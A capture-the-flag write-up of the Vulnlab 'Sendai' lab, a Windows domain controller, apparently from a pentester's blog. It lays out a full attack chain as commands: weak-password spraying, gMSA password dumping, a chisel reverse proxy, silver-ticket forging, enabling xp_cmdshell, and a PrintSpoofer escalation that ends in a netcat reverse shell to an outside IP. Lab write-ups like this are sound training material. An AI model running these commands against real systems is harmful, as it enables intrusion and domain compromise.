Vulnlab Standalone - Sendai
Vulnlab Standlone - Sendai
Sendai is a medium-difficulty standalone challenge that was initially created as a hiring challenge for senior penetration testers and red teamers by XCT. The machine offers two user paths and two root paths, so feel free to explore. I gained initial access using weak credentials, then managed to escalate privileges to a gMSA account, which ultimately gave me access to the MSSQL service account. This allowed me to craft a silver ticket for the Administrator database user. With this access, I was able to enable xp_cmdshell and abuse SeImpersonate privileges using PrintSpoofer to gain a SYSTEM shell.
Initial Access
Starting off, I added the following entries to the /etc/hosts file:
1
2
10.10.64.43 sendai.vl
10.10.64.43 dc.sendai.vl
Started of with an initial nmap scan which revealed the following information:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-14 18:08:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
Using smbclient I listed the shares and checked if there any shares which are open for unauthenticated use:
1
2
3
4
5
6
7
8
9
10
11
12
13
smbclient -L \\\\DC.sendai.vl\\
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
config Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
sendai Disk company share
SYSVOL Disk Logon server share
Users Disk
Upon checking the Sendai share I found a txt file mentioning that a penetration test discovered numerous weak passwords and recommending changes as soon as possible. Also in the transfers folder, I found the UserProfiles for a few users within the domain:
1
2
3
4
5
6
7
8
9
10
smb: \transfer\> ls
. D 0 Tue Jul 11 15:00:20 2023
.. D 0 Tue Jul 18 19:31:04 2023
anthony.smith D 0 Tue Jul 11 14:59:50 2023
clifford.davey D 0 Tue Jul 11 15:00:06 2023
elliot.yates D 0 Tue Jul 11 14:59:26 2023
lisa.williams D 0 Tue Jul 11 14:59:34 2023
susan.harper D 0 Tue Jul 11 14:59:39 2023
temp D 0 Tue Jul 11 15:00:16 2023
thomas.powell D 0 Tue Jul 11 14:59:45 2023
I saved the usernames to a file called users.txt and tried common passwords such as Sendai01, Summer2024, etc. This method allowed me to recover the password for the user lisa.williams:
1
2
SMB 10.10.64.43 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.64.43 445 DC [-] sendai.vl\lisa.williams:[REDACTED] STATUS_PASSWORD_MUST_CHANGE
Getting access to mgtsvc$
I reset the password for the user with the smbpasswd tool:
1
smbpasswd -U lisa.williams -r sendai.vl
Now that we have valid credentials I ran the remote python bloodhound ingestor to enumerate the environment:
1
bloodhound.py --zip -c All -d sendai.vl -u lisa.williams -p P@ssw0rd -dc DC.sendai.vl -ns 10.10.98.198
Inspecting the Bloodhound output and further enumerating the domain revealed the following path:
- Lisa.willams has GenericAll on the ADMSVC group
- The ADMSVC group can read the gMSA password of the mgtsvc$ user’
We can abuse this by adding the lisa.williams user to the ADMSVC group using pth-net:
1
pth-net rpc group addmem "admsvc" lisa.williams -U sendai.vl/lisa.williams -S 10.10.64.43
We can exploit this by adding the lisa.williams user to the ADMSVC group using pth-net:
1
gMSADumper.py -u 'lisa.williams' -p 'P@ssw0rd' -d 'sendai.vl'
Using evil-winrm we can get a shell on the target:
1
evil-winrm -i 10.10.98.198 -u 'mgtsvc$' -H [REDACTED]
Crafting silver tickets
Now that we have initial access on the DC I enumerated the system a bit. I found that in the C:\config folder there is a file called .sqlconfig which contains the password for the sqlsvc user. Since this user is the service account for the MSSQL service we can forge a silver ticket for a privileged user to escalate privileges. To do this I first created a proxy using chisel which allowes me to interact with the MSSQL service which is running locally. On the target machine:
1
cmd /c C:\temp\chisel.exe client [ATTACKER]:8001 R:1080:socks
On the attacker machine:
1
chisel server -p 8001 --reverse
Next I created a silver ticket using the ticketer.py tool from impacket for the Administrator and imported the kerberos ticket:
1
2
ticketer.py -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash [REDACTED] -dc-ip dc.sendai.vl Administrator -domain sendai.vl
export KRB5CCNAME=Administrator.ccache
Using this ticket we connect over the proxy to the MSSQL service as Administrator:
1
proxychains -q mssqlclient.py dc.sendai.vl -k
Since we have administrative rights we can enable xp_cmdshell so we can execute command on the system:
1
2
3
sp_configure 'show advanced options', '1'
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
Escalating to SYSTEM
Since we are the sqlsvc$ account we usually have SeImpersonate privileges which allows us to elevate to SYSTEM. We can confirm this by using:
1
whoami /privileged
This confirmed that we indeed have SeImpersonate privileges. Using Printspoofer and netcat I was able to get a reverse shell:
1
cmd /c C:\temp\PrintSpoofer.exe -c "c:\Temp\nc.exe 10.8.0.49 1337 -e cmd"